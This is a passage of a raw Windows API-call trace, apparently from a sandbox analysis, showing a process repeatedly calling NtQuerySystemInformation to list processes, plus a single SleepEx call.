(in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191d8) returned 0x0 [0161.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x190c8) returned 0x0 [0161.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0161.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x191c8) returned 0x0 [0162.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x19038) returned 0x0 [0162.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0162.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18bb8) returned 0x0 [0163.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18910) returned 0x0 [0163.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18910) returned 0x0 [0163.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18910) returned 0x0 [0163.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18910) returned 0x0 [0163.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18910) returned 0x0 [0163.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18910) returned 0x0 [0163.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x18910) returned 0x0 [0163.100] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0166.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.451] 